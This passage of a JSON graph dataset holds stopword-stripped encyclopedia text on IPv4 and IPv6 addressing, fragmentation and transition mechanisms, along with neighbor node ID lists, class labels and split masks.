introduced classless inter-domain routing cidr expressed number bits significant instance /24 class-based scheme dubbed classful contrast cidr designed permit repartitioning address space smaller larger blocks addresses could allocated users hierarchical structure created cidr managed internet assigned numbers authority iana regional internet registries rirs rir maintains publicly searchable whois database provides information ip address assignments internet engineering task force ietf internet assigned numbers authority iana restricted general use various reserved ip addresses special purposes notably addresses used multicast traffic provide addressing space unrestricted uses private networks section begin=ipv4-special-address-blocks/ approximately four billion addresses defined ipv4 18 million addresses three ranges reserved use private networks packets addresses ranges routable public internet ignored public routers therefore private hosts directly communicate public networks require network address translation routing gateway purpose section begin=ipv4-private-networks/ since two private networks e.g. two branch offices directly interoperate via public internet two networks must bridged across internet via virtual private network vpn ip tunnel encapsulates packets including headers containing private addresses protocol layer transmission across public network additionally encapsulated packets may encrypted transmission across public networks secure data rfc 3927 defines special address block 169.254.0.0/16 link-local addressing addresses valid link local network segment point-to-point connection directly connected host uses addresses routable like private addresses addresses source destination packets traversing internet addresses primarily used address autoconfiguration zeroconf host obtain ip address dhcp server internal configuration methods address block reserved standards existed address autoconfiguration microsoft created implementation called automatic private ip addressing apipa deployed millions machines became de facto standard many years later may 2005 ietf defined formal standard rfc 3927 entitled dynamic configuration ipv4 link-local addresses class network 127.0.0.0 classless network 127.0.0.0/8 reserved loopback ip packets whose source addresses belong network never appear outside host modus operandi network expands upon loopback interface networks subnet masks least 24 bits i.e class c networks classful networking networks cidr suffixes /24 /30 255.255.255.0–255.255.255.252 may address ending 0 255 classful addressing prescribed three possible subnet masks class 255.0.0.0 /8 class b 255.255.0.0 /16 class c 255.255.255.0 /24 example subnet 192.168.5.0/255.255.255.0 192.168.5.0/24 identifier 192.168.5.0 commonly used refer entire subnet avoid ambiguity representation address ending octet 0 reserved broadcast address address allows information sent interfaces given subnet rather specific machine generally broadcast address found obtaining bit complement subnet mask performing bitwise operation network identifier words broadcast address last address address range subnet example broadcast address network 192.168.5.0 192.168.5.255 networks size /24 larger broadcast address always ends 255 however mean every address ending 0 255 used host address example /16 subnet 192.168.0.0/255.255.0.0 equivalent address range 192.168.0.0–192.168.255.255 broadcast address 192.168.255.255 one use following addresses hosts even though end 255 192.168.1.255 192.168.2.255 etc also 192.168.0.0 network identifier must assigned interface addresses 192.168.1.0 192.168.2.0 etc. may assigned despite ending 0 past conflict network addresses broadcast addresses arose software used non-standard broadcast addresses zeros instead ones networks smaller /24 broadcast addresses necessarily end 255 example cidr subnet 203.0.113.16/28 broadcast address 203.0.113.31 hosts internet usually known names e.g. www.example.com primarily ip address used routing network interface identification use domain names requires translating called resolving addresses vice versa analogous looking phone number phone book using recipient name translation addresses domain names performed domain name system dns hierarchical distributed naming system allows subdelegation name spaces dns servers since 1980s apparent pool available ipv4 addresses depleted rate initially anticipated original design network address system main market forces accelerated ipv4 address depletion included threat exhaustion motivated introduction number remedial technologies classful networks classless inter-domain routing cidr methods network address translation nat strict usage-based allocation policies provide long-term solution pending address exhaustion ipv6 created 1990s made many addresses available increasing address size 128 bits ipv6 commercial deployment since 2006 primary address pool internet maintained iana exhausted 3 february 2011 last 5 blocks allocated 5 rirs apnic first rir exhaust regional pool 15 april 2011 except small amount address space reserved transition ipv6 allocated much restricted policy accepted standard long term solution use ipv6 increased address size 128 bits providing vastly increased address space also allows improved route aggregation across internet offers large subnetwork allocations minimum 2 host addresses end-users however ipv4-only hosts directly communicate ipv6-only hosts ipv6 alone provide immediate solution ipv4 exhaustion problem migration ipv6 progress completion expected take considerable time ip packet consists header section data section ip packet data checksum footer data section typically link layer encapsulates ip packets frames crc footer detects errors typically end-to-end tcp layer checksum detects errors ipv4 packet header consists 14 fields 13 required 14th field optional aptly named options fields header packed significant byte first big endian diagram discussion significant bits considered come first msb 0 bit numbering significant bit numbered 0 version field actually found four significant bits first byte example internet header length ihl field 4 bits number 32-bit words since ipv4 header may contain variable number options field specifies size header also coincides offset data minimum value field 5 indicates length 5 × 32 bits 160 bits 20 bytes 4-bit field maximum value 15 words 15 × 32 bits 480 bits 60 bytes fragment offset field measured units eight-byte blocks 13 bits long specifies offset particular fragment relative beginning original unfragmented ip datagram first fragment offset zero allows maximum offset 2 – 1 × 8 65,528 bytes would exceed maximum ip packet length 65,535 bytes header length included 65,528 20 65,548 bytes options field often used note value ihl field must include enough extra 32-bit words hold options plus padding needed ensure header contains integer number 32-bit words list options may terminated eol end options list 0x00 option necessary end options would otherwise coincide end header possible options put header follows packets containing options may considered dangerous routers blocked packet payload included checksum contents interpreted based value protocol header field common payload protocols see list ip protocol numbers complete list internet protocol enables traffic networks design accommodates networks diverse physical nature independent underlying transmission technology used link layer networks different hardware usually vary transmission speed also maximum transmission unit mtu one network wants transmit datagrams network smaller mtu may fragment datagrams ipv4 function placed internet layer performed ipv4 routers thus require implementation higher layers function routing ip packets contrast ipv6 next generation internet protocol allow routers perform fragmentation hosts must determine path mtu sending datagrams router receives packet examines destination address determines outgoing interface use interface mtu packet size bigger mtu fragment df bit packet header set 0 router may fragment packet router divides packet fragments max size fragment mtu minus ip header size 20 bytes minimum 60 bytes maximum router puts fragment packet fragment packet following changes example mtu 1,500 bytes header size 20 bytes fragment offsets would multiples formula_1 multiples 0 185 370 555 740 ... possible packet fragmented one router fragments fragmented another router example packet 4,520 bytes including 20 bytes ip header without options fragmented two packets link mtu 2,500 bytes total data size preserved 2480 bytes 2020 bytes 4500 bytes offsets formula_2 formula_3 link mtu 1,500 bytes fragment results two fragments data size preserved 1480 1000 2480 1480 540 2020 also case fragments bit remains 1 fragments came 1 last fragment arrives works usual mf bit set 0 last one course identification field continues value re-fragmented fragments way even fragments re-fragmented receiver knows initially started packet last offset last data size used calculate total data size formula_4 receiver knows packet fragment least one following conditions true receiver identifies matching fragments using foreign local address protocol id identification field receiver reassembles data fragments id using fragment offset fragments flag receiver receives last fragment fragments flag set 0 calculate size original data payload multiplying last fragment offset eight adding last fragment data size given example calculation 495*8 540 4500 bytes receiver fragments reassembled correct sequence according offsets form original datagram ip addresses tied permanent manner hardware identifications indeed network interface multiple ip addresses modern operating systems hosts routers need additional mechanisms identify relationship device interfaces ip addresses order properly deliver ip packet destination host link address resolution protocol arp performs ip-address-to-hardware-address translation ipv4 hardware address also called mac address addition reverse correlation often necessary example ip host booted connected network needs determine ip address unless address preconfigured administrator protocols inverse correlations exist internet protocol suite currently used methods dynamic host configuration protocol dhcp bootstrap protocol bootp infrequently reverse arp",
    "neighbors": [
      4609,
      10242,
      5636,
      1541,
      1030,
      3592,
      8204,
      8211,
      6681,
      6682,
      6172,
      4638,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      6704,
      562,
      1586,
      9269,
      11319,
      1081,
      11321,
      3133,
      4158,
      5181,
      6723,
      11332,
      8265,
      8266,
      4687,
      6735,
      4691,
      10341,
      10344,
      3695,
      4723,
      9843,
      5749,
      3703,
      2679,
      4729,
      5241,
      9339,
      11387,
      5246,
      5249,
      5251,
      9860,
      2184,
      649,
      2185,
      7817,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      10402,
      4772,
      9380,
      9381,
      3751,
      3752,
      172,
      2221,
      686,
      4268,
      1200,
      6318,
      6319,
      10417,
      10924,
      9909,
      4793,
      7865,
      4797,
      702,
      7361,
      7364,
      8391,
      8905,
      3274,
      1229,
      5843,
      9939,
      10461,
      7391,
      3297,
      6371,
      7908,
      2797,
      751,
      8432,
      10992,
      8946,
      755,
      5875,
      7411,
      3322,
      9987,
      3847,
      2827,
      1297,
      4369,
      5906,
      10005,
      6422,
      11029,
      5402,
      5405,
      10017,
      9511,
      4396,
      7984,
      10035,
      6456,
      8504,
      2362,
      11579,
      10748,
      829,
      5437,
      5439,
      1859,
      2373,
      2887,
      10058,
      1867,
      6992,
      849,
      1876,
      343,
      2904,
      9048,
      7003,
      8539,
      10589,
      5470,
      5471,
      5472,
      1893,
      871,
      11112,
      361,
      2409,
      2922,
      367,
      891,
      6524,
      10622,
      2431,
      11647,
      2945,
      1411,
      10115,
      8073,
      6540,
      6541,
      3472,
      7570,
      6551,
      1435,
      5531,
      10144,
      10659,
      933,
      4005,
      2983,
      2476,
      6577,
      2996,
      10171,
      3006,
      11202,
      9670,
      8648,
      3018,
      2509,
      8144,
      8669,
      5598,
      8670,
      10723,
      10727,
      3564,
      5102,
      11249,
      9202,
      11250,
      8692,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5470,
    "label": 5,
    "text": "IPv6:ipv6 internet protocol version 6 ipv6 recent version internet protocol ip communications protocol provides identification location system computers networks routes traffic across internet ipv6 developed internet engineering task force ietf deal long-anticipated problem ipv4 address exhaustion ipv6 intended replace ipv4 december 1998 ipv6 became draft standard ietf subsequently ratified internet standard 14 july 2017 devices internet assigned unique ip address identification location definition rapid growth internet commercialization 1990s became evident far addresses would needed connect devices ipv4 address space available 1998 internet engineering task force ietf formalized successor protocol ipv6 uses 128-bit address theoretically allowing 2 approximately addresses actual number slightly smaller multiple ranges reserved special use completely excluded use total number possible ipv6 addresses times many ipv4 uses 32-bit addresses provides approximately 4.3 billion addresses two protocols designed interoperable complicating transition ipv6 however several ipv6 transition mechanisms devised permit communication ipv4 ipv6 hosts ipv6 provides technical benefits addition larger addressing space particular permits hierarchical address allocation methods facilitate route aggregation across internet thus limit expansion routing tables use multicast addressing expanded simplified provides additional optimization delivery services device mobility security configuration aspects considered design protocol ipv6 addresses represented eight groups separated colons four hexadecimal digits full representation may simplified several methods notation example 2001:0db8:0000:0000:0000:8a2e:0370:7334 becomes 2001 db8 :8a2e:370:7334 ipv6 internet layer protocol packet-switched internetworking provides end-to-end datagram transmission across multiple ip networks closely adhering design principles developed previous version protocol internet protocol version 4 ipv4 addition offering addresses ipv6 also implements features present ipv4 simplifies aspects address configuration network renumbering router announcements changing network connectivity providers simplifies processing packets routers placing responsibility packet fragmentation end points ipv6 subnet size standardized fixing size host identifier portion address 64 bits network security design requirement ipv6 architecture included original specification ipsec addressing architecture ipv6 defined allows three different types transmission unicast anycast multicast internet protocol version 4 ipv4 first publicly used version internet protocol ipv4 developed research project defense advanced research projects agency darpa united states department defense agency becoming foundation internet world wide web ipv4 includes addressing system uses numerical identifiers consisting 32 bits addresses typically displayed quad-dotted notation decimal values four octets range 0 255 8 bits per number thus ipv4 provides addressing capability 2 approximately 4.3 billion addresses address exhaustion initially concern ipv4 version originally presumed test darpa networking concepts first decade operation internet became apparent methods developed conserve address space early 1990s even redesign addressing system using classless network model became clear would suffice prevent ipv4 address exhaustion changes internet infrastructure needed last unassigned top-level address blocks 16 million ipv4 addresses allocated february 2011 internet assigned numbers authority iana five regional internet registries rirs however rir still available address pools expected continue standard address allocation policies one /8 classless inter-domain routing cidr block remains blocks 1024 addresses /22 provided rirs local internet registry lir september 2015 asia-pacific network information centre apnic réseaux ip européens network coordination centre ripe_ncc latin america caribbean network information centre lacnic american registry internet numbers arin reached stage leaves african network information center afrinic sole regional internet registry still using normal protocol distributing ipv4 addresses november 2018 afrinic minimum allocation /22 1024 ipv4 addresses lir may receive additional allocation 80 address space utilized widely expected internet use ipv4 alongside ipv6 foreseeable future direct communication ipv4 ipv6 network protocols possible internet data transmitted form network packets ipv6 specifies new packet format designed minimize packet header processing routers headers ipv4 packets ipv6 packets significantly different two protocols interoperable however transport application-layer protocols need little change operate ipv6 exceptions application protocols embed internet-layer addresses file transfer protocol ftp network time protocol ntp new address format may cause conflicts existing protocol syntax main advantage ipv6 ipv4 larger address space length ipv6 address 128 bits compared 32 bits ipv4 address space therefore 2 approximately addresses 340,282,366,920,938,463,463,374,607,431,768,211,456 approximately 340 undecillion 340 billion billion billion billion addresses ipv4 addresses reserved special uses addition ipv4 address space poorly allocated 2011 approximately 14 available addresses utilized numbers large intent designers ipv6 address space assure geographical saturation usable addresses rather longer addresses simplify allocation addresses enable efficient route aggregation allow implementation special addressing features ipv4 complex classless inter-domain routing cidr methods developed make best use small address space standard size subnet ipv6 2 addresses square size entire ipv4 address space thus actual address space utilization rates small ipv6 network management routing efficiency improved large subnet space hierarchical route aggregation multicasting transmission packet multiple destinations single send operation part base specification ipv6 ipv4 optional although commonly implemented feature ipv6 multicast addressing features protocols common ipv4 multicast also provides changes improvements eliminating need certain protocols ipv6 implement traditional ip broadcast i.e transmission packet hosts attached link using special broadcast address therefore define broadcast addresses ipv6 result achieved sending packet link-local nodes multicast group address ff02 :1 analogous ipv4 multicasting address 224.0.0.1 ipv6 also provides new multicast implementations including embedding rendezvous point addresses ipv6 multicast group address simplifies deployment inter-domain solutions ipv4 difficult organization get even one globally routable multicast group assignment implementation inter-domain solutions arcane unicast address assignments local internet registry ipv6 least 64-bit routing prefix yielding smallest subnet size available ipv6 also 64 bits assignment possible embed unicast address prefix ipv6 multicast address format still providing 32-bit block least significant bits address approximately 4.2 billion multicast group identifiers thus user ipv6 subnet automatically available set globally routable source-specific multicast groups multicast applications ipv6 hosts configure automatically connected ipv6 network using neighbor discovery protocol via internet control message protocol version 6 icmpv6 router discovery messages first connected network host sends link-local router solicitation multicast request configuration parameters routers respond request router advertisement packet contains internet layer configuration parameters routers present special case requirements address configuration often sources autoconfiguration information router prefix advertisements stateless configuration routers achieved special router renumbering protocol renumbering existing network new connectivity provider different routing prefixes major effort ipv4 ipv6 however changing prefix announced routers principle renumber entire network since host identifiers least-significant 64 bits address independently self-configured host ipv6 stateless address auto-configuration unsuitable ipv6 like ipv4 allows stateful configuration dynamic host configuration protocol version 6 dhcpv6 manual static configuration hosts like ipv4 ipv6 supports globally unique ip addresses design ipv6 intended re-emphasize end-to-end principle network design originally conceived establishment early internet approach device network unique address globally reachable directly location internet unique ip address potentially used track network activity device moreover using ipv6 address auto-configuration interface identifier mac address network card used make public ipv6 interface identifier unique exposing type hardware used providing unique handle user online activity autoconfiguration basis network card mac address therefore particular privacy concern mobile devices laptops access internet different local area networks mac based interface identifier would always stay thus mac address based interface identifier used track movement usage particular mobile device ipv6 developed mid-90s internet accessed large number mobile devices privacy priority become today address privacy concerns slaac protocol updated mechanisms termed “ privacy extensions stateless address autoconfiguration ipv6 ” codified rfc 4941 rfc 7217 rfc 8064 prevents ipv6 address leaking mac address device first method generate interface identifier randomly interface identifier generated two devices local area network duplicate address detection dad function ipv6 neighbor discovery protocol ndp resolve situation slaac privacy extension also implements time configurable ipv6 interface addresses discarded new interface identifier generated typically time configured 24 hours ipv6 autoconfiguration generate set new ipv6 host address every day stable address needed another method generate interface identifier secret key network prefix since 2017 method codified rfc 7217 preferred stable private address according ietf late 2014 slaac privacy extensions functionality implemented following operating systems microsoft windows windows xp versions mac os x 10.7 onward versions ios since 4.3 versions android since 4.0 ice cream sandwich privacy extension enabled default windows since xp sp1 os x since 10.7 ios since version 4.3 linux distributions enabled privacy extensions well internet protocol security ipsec originally developed ipv6 found widespread deployment first ipv4 re-engineered ipsec mandatory part ipv6 protocol implementations internet key exchange ike recommended rfc 6434 inclusion ipsec ipv6 implementations downgraded recommendation considered impractical require full ipsec implementation types devices may use ipv6 however rfc 4301 ipv6 protocol implementations implement ipsec need implement ikev2 need support minimum set cryptographic algorithms requirement help make ipsec implementations interoperable devices different vendors ipsec authentication header ah encapsulating security payload header esp implemented ipv6 extension headers packet header ipv6 simpler ipv4 header many rarely used fields moved optional header extensions simplified ipv6 packet header process packet forwarding routers simplified although ipv6 packet headers least twice size ipv4 packet headers packet processing routers generally efficient less processing required routers due headers aligned match common word sizes moreover ipv6 header include checksum ipv4 header checksum calculated ipv4 header recalculated routers every time time live called hop limit ipv6 protocol reduced one absence checksum ipv6 header furthers end-to-end principle internet design envisioned processing network occurs leaf nodes integrity protection data encapsulated ipv6 packet assumed assured link layer error detection higher-layer protocols namely transmission control protocol tcp user datagram protocol udp transport layer thus ipv4 allowed udp datagram headers checksum indicated 0 header field ipv6 requires checksum udp headers ipv6 routers perform ip fragmentation ipv6 hosts required either perform path mtu discovery perform end-to-end fragmentation send packets larger default maximum transmission unit mtu 1280 octets unlike mobile ipv4 mobile ipv6 avoids triangular routing therefore efficient native ipv6 ipv6 routers may also allow entire subnets move new router connection point without renumbering ipv6 packet header minimum size 40 octets 320 bits options implemented extensions provides opportunity extend protocol future without affecting core packet structure however study 2015 indicated network operators dropped ipv6 packets extension headers traversed transit autonomous systems ipv4 limits packets 65,535 2−1 octets payload ipv6 node optionally handle packets limit referred jumbograms large 4,294,967,295 2−1 octets use jumbograms may improve performance high-mtu links use jumbograms indicated jumbo payload option extension header ipv6 packet two parts header payload header consists fixed portion minimal functionality required packets may followed optional extensions implement special features fixed header occupies first 40 octets 320 bits ipv6 packet contains source destination addresses traffic classification options hop counter type optional extension payload follows header next header field tells receiver interpret data follows header packet contains options field contains option type next option next header field last option points upper-layer protocol carried packet payload extension headers carry options used special treatment packet network e.g. routing fragmentation security using ipsec framework without special options payload must less jumbo payload option hop-by-hop options extension header payload must less 4 gb unlike ipv4 routers never fragment packet hosts expected use path mtu discovery make packets small enough reach destination without needing fragmented see ipv6 packet fragmentation ipv6 addresses 128 bits design ipv6 address space implements different design philosophy ipv4 subnetting used improve efficiency utilization small address space ipv6 address space deemed large enough foreseeable future local area subnet always uses 64 bits host portion address designated interface identifier most-significant 64 bits used routing prefix identifier unique within subnet host connected ipv6 mechanism automatic address detection address autoconfiguration always produces unique assignments 128 bits ipv6 address represented 8 groups 16 bits group written four hexadecimal digits sometimes called hextets formally hexadectets informally quibble quad-nibble groups separated colons example representation convenience ipv6 address may abbreviated shorter notations application following rules example application rules loopback address defined may abbreviated using rules ipv6 address may one representation ietf issued proposed standard representing text interfaces ipv6 hosts require link-local address ipv6 link-local address derived mac address interface prefix process involves filling address space prefix bits left-justified most-significant bit filling mac address eui-64 format least-significant bits bits remain filled two parts set zero ipv6 implement broadcast functionality address resolution protocol arp based neighbor discovery protocol ndp nd used link layer map layer 3 ipv6 addresses layer 2 addresses mac address ethernet network cards ndp relies icmpv6 multicast transmission ipv6 hosts verify uniqueness ipv6 addresses local area network lan sending neighbor solicitation message asking link layer address ipv6 address host lan using address responds lan mac addresses designed unique network card minimizes chances duplication generated link-local address ipv6 host determines lan connected router network card ipv6 implementation sending icmpv6 router solicitation message all-routers multicast group link-local address source answer predetermined number attempts host concludes routers connected get response router network information inside needed create globally unique address also two flag bits tell host whether use dhcp get information addresses assignment procedure global addresses similar local address construction prefix supplied router advertisements network multiple prefix announcements cause multiple addresses configured stateless address autoconfiguration slaac requires address block defined local internet registries assigned least blocks divide among subordinate networks initial recommendation stated assignment subnet end-consumer sites replaced recommends giving home sites significantly single recommend every home site given either specifically considered remains seen isps honor recommendation example initial trials comcast customers given single network domain name system dns hostnames mapped ipv6 addresses aaaa quad-a resource records reverse resolution ietf reserved domain ip6.arpa name space hierarchically divided 1-digit hexadecimal representation nibble units 4 bits ipv6 address scheme defined dual-stack host queries dns server resolve fully qualified domain name fqdn dns client host sends two dns requests one querying records querying aaaa records host operating system may configured preference address selection rules alternate record type used early dns implementations ipv6 designed facilitate network renumbering a6 records forward lookup number innovations bit-string labels dname records defined references discussion pros cons schemes deprecated experimental status ipv6 foreseen supplant ipv4 instantaneously protocols continue operate simultaneously time therefore ipv6 transition mechanisms needed enable ipv6 hosts reach ipv4 services allow isolated ipv6 hosts networks reach ipv4 infrastructure according silvia hagen dual-stack implementation ipv4 ipv6 devices easiest way migrate ipv6 many transition mechanisms use tunneling encapsulate ipv6 traffic within ipv4 networks vice versa imperfect solution reduces maximum transmission unit mtu link therefore complicates path mtu discovery may increase latency dual-stack ip implementations provide complete ipv4 ipv6 protocol stacks operating system computer network device top common physical layer implementation ethernet permits dual-stack hosts participate ipv6 ipv4 networks simultaneously method defined device dual-stack implementation operating system ipv4 ipv6 address communicate nodes lan internet using either ipv4 ipv6 domain name system dns protocol used ip protocols resolve fully qualified domain names fqdn ip addresses dual stack requires resolving dns server resolve types addresses dual stack dns server would hold ipv4 addresses records ipv6 addresses aaaa records depending destination resolved dns name server may return ipv4 ipv6 ip address default address selection mechanism preferred protocol needs configured either hosts dns server ietf published happy eyeballs assist dual stack applications connect using ipv4 ipv6 prefer ipv6 connection available however dual-stack also needs implemented routers host service dns server returned ipv6 address dual-stack clients configured prefer ipv6 network able forward ipv6 packets using ipv6 versions routing protocols dual stack networks protocols place application layer migrated ipv6 dual-stack supported major operating system network device vendors legacy networking hardware servers n't support ipv6 internet service providers isps increasingly providing business private customers public-facing ipv6 global unicast addresses however local area network lan ipv4 still used isp provide public facing ipv6 ipv4 lan addresses translated public facing ipv6 address using nat64 network address translation nat mechanism isps provide customers public-facing ipv4 ipv6 addresses thus supporting dual stack networking isps exhausted globally routable ipv4 address pool meanwhile isp customers still trying reach ipv4 web servers destinations significant percentage isps regional internet registry rir zones obtained ipv6 address space includes many world ’ major isps mobile network operators verizon wireless starhub cable chubu telecommunications kabel deutschland swisscom t-mobile internode telefonica isps still allocate customers ipv4 addresses many isps allocate customers ipv6 dual stack ipv4 ipv6 isps report share ipv6 traffic customers network anything 20 40 mid-2017 ipv6 traffic still accounted fraction total traffic several large internet exchange points ixps ams-ix reported 2 seattleix reported 7 2017 survey found many dsl customers served dual stack isp request dns servers resolve fully qualified domain names ipv6 addresses survey also found majority traffic ipv6-ready webserver resources still requested served ipv4 mostly due isp customers use dual stack facility provided isp lesser extent due customers ipv4-only isps technical basis tunneling encapsulating ipv6 packets ipv4 packets outlined rfc 4213 internet backbone ipv4-only one frequently used tunneling protocols 6to4 teredo tunneling also frequently used integrating ipv6 lans ipv4 internet backbone teredo outlined rfc 4380 allows ipv6 local area networks tunnel ipv4 networks encapsulating ipv6 packets within udp teredo relay ipv6 router mediates teredo server native ipv6 network expected 6to4 teredo would widely deployed isp networks would switch native ipv6 2014 google statistics showed use mechanisms dropped almost 0 hybrid dual-stack ipv6/ipv4 implementations recognize special class addresses ipv4-mapped ipv6 addresses addresses typically written 96-bit prefix standard ipv6 format remaining 32 bits written customary dot-decimal notation ipv4 addresses group consist 80-bit prefix zeros next 16 bits ones remaining least-significant 32 bits contain ipv4 address example :ffff:192.0.2.128 represents ipv4 address 192.0.2.128 another deprecated format ipv4-compatible ipv6 addresses :192.0.2.128 significant internal differences ipv4 ipv6 protocol stacks lower-level functionality available programmers ipv6 stack work used ipv4-mapped addresses common ipv6 stacks implement ipv4-mapped address feature either ipv6 ipv4 stacks separate implementations e.g. microsoft windows 2000 xp server 2003 security concerns openbsd operating systems program must open separate socket ip protocol uses systems e.g. linux kernel netbsd freebsd feature controlled socket option ipv6_v6only specified compatibility ipv6 networking mainly software firmware issue however much older hardware could principle upgraded likely replaced instead 2010 american registry internet numbers arin suggested internet servers prepared serve ipv6-only clients january 2012 host software may ipv4 ipv6 networking software may support dual-stack hybrid dual-stack operation many popular applications networking capabilities compliant software transitioning mechanisms outlined ipv6 implemented major operating systems use commercial business home consumer environments personal computers smartphones running recent major operating system versions support ipv6 cablelabs consortium published 160 mbit/s docsis 3.0 ipv6-ready specification cable modems august 2006 docsis 2.0 updated docsis 2.0 ipv6 provide ipv6 support may available firmware upgrade addition nodes ipv6 enabled default software manufacturer may result inadvertent creation shadow networks causing ipv6 traffic flowing networks ipv4 security management place may also occur operating system upgrades newer operating system enables ipv6 default older one failing update security infrastructure accommodate ipv6 lead ipv6 traffic bypassing shadow networks occurred business networks enterprises replacing windows xp systems ipv6 stack enabled default windows 7 systems ipv6 stack implementors therefore recommended disabling ipv4 mapped addresses instead using dual-stack network supporting ipv4 ipv6 necessary research shown use fragmentation leveraged evade network security controls similar ipv4 result requires first fragment ipv6 packet contains entire ipv6 header chain pathological fragmentation cases forbidden additionally result research evasion ra-guard deprecated use fragmentation neighbor discovery discouraged use fragmentation secure neighbor discovery send due anticipated global growth internet internet engineering task force ietf early 1990s started effort develop next generation ip protocol beginning 1992 several proposals appeared expanded internet addressing system end 1992 ietf announced call white papers september 1993 ietf created temporary ad-hoc ip next generation ipng area deal specifically issues new area led allison mankin scott bradner directorate 15 engineers diverse backgrounds direction-setting preliminary document review working-group members j. allard microsoft steve bellovin jim bound digital equipment corporation ross callon wellfleet brian carpenter cern dave clark mit john curran nearnet steve deering xerox dino farinacci cisco paul francis ntt eric fleischmann boeing mark knopper ameritech greg minshall novell rob ullmann lotus lixia zhang xerox internet engineering task force adopted ipng model 25 july 1994 formation several ipng working groups 1996 series rfcs released defining internet protocol version 6 ipv6 starting version 5 used experimental internet stream protocol first rfc standardize ipv6 1995 became obsoleted 1998 july 2017 rfc replaced 1993 introduction classless inter-domain routing cidr routing ip address allocation internet extensive use network address translation nat delayed ipv4 address exhaustion final phase exhaustion started 3 february 2011 universities among early adopters ipv6 virginia tech deployed ipv6 trial location 2004 since expanded ipv6 deployment across campus network 2016 82 traffic network used ipv6 imperial college london experimenting ipv6 deployment since 2003 2016 ipv6 traffic networks averaged 20 40 significant portion ipv6 traffic generated high energy physics collaboration cern depends entirely ipv6 since 2008 domain name system dns supports ipv6 year ipv6 first used major world event 2008 summer olympic games beijing 4 domain names 16.2 networks internet ipv6 protocol support 2014 ipv4 still carried 99 worldwide internet traffic deployment ipv6 internet backbone progress 2018 25.3 54,000 autonomous systems advertised ipv4 ipv6 prefixes global border gateway protocol bgp routing database 243 networks advertised ipv6 prefix internet backbone transit networks offering ipv6 support exist every country globally except parts africa middle east china mid-2018 major european broadband isps deployed ipv6 majority customers british sky broadcasting provided 86 customers ipv6 deutsche telekom 56 deployment ipv6 xs4all netherlands 73 deployment belgium broadband isps voo telenet 73 63 ipv6 deployment respectively united states broadband isp comcast ipv6 deployment 66 2018 comcast reported estimated 36.1 million ipv6 users reported 22.3 million ipv6 users internet exchanges amsterdam seattle large exchanges publicly show ipv6 traffic statistics october 2018 tracking 2.9 7.7 growing 1.9 -2.6 per year respectively percentage users reaching google services ipv6 29 26 alexa top 1000 web servers support ipv6 according internet society report state ipv6 deployment 2018 major mobile network providers drove ipv6 adoption japan mobile network providers nippon telegraph telephone ntt kddi softbank pushed forward ipv6 deployment india ipv6 adoption advanced jio lte network covers india ’ 29 states reaches 80 country ’ population 2018 jio estimated 237.6 million ipv6 users united states ipv6 adoption pioneered verizon wireless 2009 verizon mandated ipv6 operation reduced ipv4 optional capability lte cellular hardware verizon productively deployed ipv6 across existing ipv4 network avoid network complexity arose networks using private network ipv4 address space 2018 80 traffic verizon wireless major content providers using ipv6 united states data centers transitioned ipv6 networking since 2018 facebook eliminating ipv4 data centers network-facing load balancers accept ipv4 ipv6 traffic linkedin microsoft stated intentions move networks ipv6 google linkedin akamai 2018 deploying ipv6 data center networks connecting natively ipv6 end users governments including united states china issued guidelines requirements ipv6 capability",
    "neighbors": [
      4609,
      10242,
      5636,
      1030,
      3592,
      8211,
      6681,
      6682,
      6172,
      9245,
      4638,
      10271,
      6689,
      9251,
      2085,
      7208,
      6189,
      7214,
      8238,
      6704,
      562,
      1586,
      2101,
      9269,
      11319,
      1081,
      11321,
      3133,
      4158,
      5181,
      6723,
      6724,
      11332,
      6214,
      8265,
      1098,
      8266,
      5196,
      4687,
      592,
      6735,
      1618,
      4691,
      2136,
      10851,
      10341,
      10344,
      3695,
      4723,
      9843,
      5749,
      2679,
      119,
      2168,
      3703,
      4729,
      5241,
      9339,
      5246,
      10879,
      11387,
      5249,
      5251,
      9860,
      4229,
      2184,
      649,
      2185,
      651,
      7817,
      2701,
      6797,
      9868,
      10897,
      3218,
      1172,
      9365,
      11413,
      152,
      10906,
      10908,
      2206,
      3742,
      3744,
      161,
      7329,
      8353,
      4772,
      3237,
      9380,
      3751,
      3752,
      9381,
      172,
      2221,
      686,
      4268,
      6318,
      6319,
      7855,
      2739,
      7859,
      9909,
      10924,
      4793,
      7865,
      699,
      4797,
      702,
      7364,
      10950,
      8391,
      8905,
      3274,
      1229,
      5843,
      9939,
      3286,
      7384,
      10461,
      7391,
      225,
      3297,
      6371,
      3812,
      7908,
      10466,
      2797,
      238,
      751,
      8432,
      10992,
      8946,
      755,
      5875,
      7411,
      11510,
      3322,
      9987,
      3847,
      1297,
      4369,
      8467,
      10005,
      11029,
      1304,
      5402,
      4891,
      5405,
      10017,
      8482,
      9511,
      9001,
      4396,
      7983,
      7984,
      10033,
      10035,
      6456,
      8504,
      2362,
      11065,
      10748,
      829,
      5437,
      11579,
      1859,
      2373,
      2887,
      3399,
      10058,
      1867,
      849,
      3409,
      1876,
      11606,
      343,
      1367,
      2904,
      4439,
      7003,
      8539,
      5469,
      9048,
      5471,
      5472,
      865,
      10589,
      1893,
      3942,
      871,
      5991,
      361,
      2922,
      11112,
      367,
      3441,
      6521,
      7546,
      891,
      6524,
      10622,
      2431,
      10624,
      2945,
      11647,
      1411,
      10115,
      8073,
      9098,
      6028,
      6540,
      6541,
      8080,
      1937,
      914,
      7570,
      5531,
      10144,
      11682,
      10659,
      933,
      9125,
      2983,
      939,
      2476,
      11693,
      6577,
      2996,
      10171,
      3006,
      11201,
      9670,
      8648,
      3018,
      2509,
      8654,
      3023,
      8144,
      4053,
      8669,
      8670,
      10723,
      10727,
      2027,
      3564,
      5102,
      11248,
      11249,
      9202,
      11250,
      4084,
      8692,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 5471,
    "label": 5,
